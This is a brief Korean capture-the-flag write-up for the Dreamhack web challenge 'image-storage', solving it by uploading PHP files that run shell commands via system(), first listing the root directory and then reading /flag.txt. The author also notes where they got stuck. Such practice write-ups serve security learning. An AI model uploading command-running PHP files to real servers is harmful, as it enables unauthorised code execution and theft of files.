(Dreamhack :: Webhacking) image-storage

-문제소스

+upload.php

 

+list.php

+index.php

-풀이

-----------------------------------------------------------------------------------------------------------------------------------

<?php

system("cd ../../../../../;pwd;ls");

?>

다음  4.php파일을 업로드한 후에 리스트에서 4.php파일을 확인한 결과

-----------------------------------------------------------------------------------------------------------------------------------

<?php

system("cat /flag.txt");

?>

다음 소스코드의 php파일을 업로드 하면 flag를 획득할 수 있다.

 

-막힌부분

문제에서 /flag.txt에 flag가 존재한다고 되어있는데 /의 존재 의미를 제대로 파악하지 못 했다.

ls 명령어 cd ../;ls명령어를 쓰면서 삽질했다.